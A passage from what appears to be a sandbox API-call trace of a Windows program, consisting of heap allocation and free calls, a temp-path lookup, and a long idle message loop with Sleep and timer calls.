RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0306.147] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0306.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0306.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0306.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0306.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0306.148] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0306.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0306.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0306.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0306.149] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0306.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0306.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0306.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0306.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0306.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0306.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0306.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0306.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0306.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0306.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0306.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0306.149] timeGetTime () returned 0x4c753 [0306.149] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.149] Sleep (dwMilliseconds=0xa) [0306.150] timeGetTime () returned 0x4c762 [0306.150] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.150] Sleep (dwMilliseconds=0xa) [0306.166] timeGetTime () returned 0x4c772 [0306.166] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.166] Sleep (dwMilliseconds=0xa) [0306.182] timeGetTime () returned 0x4c781 [0306.182] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.182] Sleep (dwMilliseconds=0xa) [0306.197] timeGetTime () returned 0x4c791 [0306.197] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.197] Sleep (dwMilliseconds=0xa) [0306.213] timeGetTime () returned 0x4c7a1 [0306.213] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.213] Sleep (dwMilliseconds=0xa) [0306.228] timeGetTime () returned 0x4c7b0 [0306.228] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.228] Sleep (dwMilliseconds=0xa) [0306.244] timeGetTime () returned 0x4c7c0 [0306.244] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.244] Sleep (dwMilliseconds=0xa) [0306.260] timeGetTime () returned 0x4c7cf [0306.260] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.260] Sleep (dwMilliseconds=0xa) [0306.275] timeGetTime () returned 0x4c7df [0306.275] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.275] Sleep (dwMilliseconds=0xa) [0306.291] timeGetTime () returned 0x4c7ef [0306.291] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.291] Sleep (dwMilliseconds=0xa) [0306.308] timeGetTime () returned 0x4c7fe [0306.308] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.308] Sleep (dwMilliseconds=0xa) [0306.322] timeGetTime () returned 0x4c80e [0306.322] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.322] Sleep (dwMilliseconds=0xa) [0306.339] timeGetTime () returned 0x4c81d [0306.339] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.339] Sleep (dwMilliseconds=0xa) [0306.353] timeGetTime () returned 0x4c82d [0306.353] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.353] Sleep (dwMilliseconds=0xa) [0306.369] timeGetTime () returned 0x4c83d [0306.369] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.369] Sleep (dwMilliseconds=0xa) [0306.384] timeGetTime () returned 0x4c84c [0306.384] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.384] Sleep (dwMilliseconds=0xa) [0306.400] timeGetTime () returned 0x4c85c [0306.400] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.400] Sleep (dwMilliseconds=0xa) [0306.416] timeGetTime () returned 0x4c86b [0306.416] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.416] Sleep (dwMilliseconds=0xa) [0306.431] timeGetTime () returned 0x4c87b [0306.431] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.431] Sleep (dwMilliseconds=0xa) [0306.447] timeGetTime () returned 0x4c88b [0306.447] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.447] Sleep (dwMilliseconds=0xa) [0306.462] timeGetTime () returned 0x4c89a [0306.463] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.463] Sleep (dwMilliseconds=0xa) [0306.478] timeGetTime () returned 0x4c8aa [0306.478] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.478] Sleep (dwMilliseconds=0xa) [0306.493] timeGetTime () returned 0x4c8b9 [0306.494] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.494] Sleep (dwMilliseconds=0xa) [0306.515] timeGetTime () returned 0x4c8c9 [0306.515] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.515] Sleep (dwMilliseconds=0xa) [0306.525] timeGetTime () returned 0x4c8d9 [0306.525] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.525] Sleep (dwMilliseconds=0xa) [0306.540] timeGetTime () returned 0x4c8e8 [0306.540] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.540] Sleep (dwMilliseconds=0xa) [0306.556] timeGetTime () returned 0x4c8f8 [0306.556] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.556] Sleep (dwMilliseconds=0xa) [0306.572] timeGetTime () returned 0x4c907 [0306.572] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.572] Sleep (dwMilliseconds=0xa) [0306.587] timeGetTime () returned 0x4c917 [0306.587] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.587] Sleep (dwMilliseconds=0xa) [0306.603] timeGetTime () returned 0x4c927 [0306.603] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.603] Sleep (dwMilliseconds=0xa) [0306.618] timeGetTime () returned 0x4c936 [0306.618] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.618] Sleep (dwMilliseconds=0xa) [0306.634] timeGetTime () returned 0x4c946 [0306.634] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.634] Sleep (dwMilliseconds=0xa) [0306.649] timeGetTime () returned 0x4c955 [0306.650] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.650] Sleep (dwMilliseconds=0xa) [0306.665] timeGetTime () returned 0x4c965 [0306.665] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.665] Sleep (dwMilliseconds=0xa) [0306.681] timeGetTime () returned 0x4c975 [0306.681] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.681] Sleep (dwMilliseconds=0xa) [0306.696] timeGetTime () returned 0x4c984 [0306.696] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.696] Sleep (dwMilliseconds=0xa) [0306.712] timeGetTime () returned 0x4c994 [0306.712] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.712] Sleep (dwMilliseconds=0xa) [0306.729] timeGetTime () returned 0x4c9a3 [0306.729] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.729] Sleep (dwMilliseconds=0xa) [0306.743] timeGetTime () returned 0x4c9b3 [0306.743] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.743] Sleep (dwMilliseconds=0xa) [0306.759] timeGetTime () returned 0x4c9c3 [0306.759] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.759] Sleep (dwMilliseconds=0xa) [0306.774] timeGetTime () returned 0x4c9d2 [0306.774] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.774] Sleep (dwMilliseconds=0xa) [0306.790] timeGetTime () returned 0x4c9e2 [0306.790] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.790] Sleep (dwMilliseconds=0xa) [0306.806] timeGetTime () returned 0x4c9f1 [0306.806] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0306.806] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0306.806] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0306.806] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0306.806] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0306.806] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.806] Sleep (dwMilliseconds=0xa) [0306.821] timeGetTime () returned 0x4ca01 [0306.821] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.821] Sleep (dwMilliseconds=0xa) [0306.837] timeGetTime () returned 0x4ca11 [0306.837] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.837] Sleep (dwMilliseconds=0xa) [0306.852] timeGetTime () returned 0x4ca20 [0306.852] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.853] Sleep (dwMilliseconds=0xa) [0306.868] timeGetTime () returned 0x4ca30 [0306.868] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.868] Sleep (dwMilliseconds=0xa) [0306.884] timeGetTime () returned 0x4ca3f [0306.884] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.884] Sleep (dwMilliseconds=0xa) [0306.900] timeGetTime () returned 0x4ca4f [0306.900] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.900] Sleep (dwMilliseconds=0xa) [0306.915] timeGetTime () returned 0x4ca5f [0306.915] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.915] Sleep (dwMilliseconds=0xa) [0306.930] timeGetTime () returned 0x4ca6e [0306.930] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.930] Sleep (dwMilliseconds=0xa) [0306.946] timeGetTime () returned 0x4ca7e [0306.946] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.946] Sleep (dwMilliseconds=0xa) [0306.967] timeGetTime () returned 0x4ca8d [0306.967] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.967] Sleep (dwMilliseconds=0xa) [0306.984] timeGetTime () returned 0x4ca9d [0306.984] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.984] Sleep (dwMilliseconds=0xa) [0306.993] timeGetTime () returned 0x4caad [0306.993] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0306.993] Sleep (dwMilliseconds=0xa) [0307.009] timeGetTime () returned 0x4cabc [0307.009] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.009] Sleep (dwMilliseconds=0xa) [0307.024] timeGetTime () returned 0x4cacc [0307.024] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.024] Sleep (dwMilliseconds=0xa) [0307.039] timeGetTime () returned 0x4cadb [0307.040] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.040] Sleep (dwMilliseconds=0xa) [0307.055] timeGetTime () returned 0x4caeb [0307.055] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.055] Sleep (dwMilliseconds=0xa) [0307.071] timeGetTime () returned 0x4cafb [0307.071] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.071] Sleep (dwMilliseconds=0xa) [0307.086] timeGetTime () returned 0x4cb0a [0307.086] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.086] Sleep (dwMilliseconds=0xa) [0307.102] timeGetTime () returned 0x4cb1a [0307.102] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.102] Sleep (dwMilliseconds=0xa) [0307.118] timeGetTime () returned 0x4cb29 [0307.118] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.118] Sleep (dwMilliseconds=0xa) [0307.133] timeGetTime () returned 0x4cb39 [0307.133] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0307.133] Sleep (dwMilliseconds=0xa) [0307.149] timeGetTime () returned 0x4cb49 [0307.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0307.149] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0307.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0307.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0307.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0307.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0307.150] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0307.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0307.150] HeapFree (in: hHeap=0x25c0000, 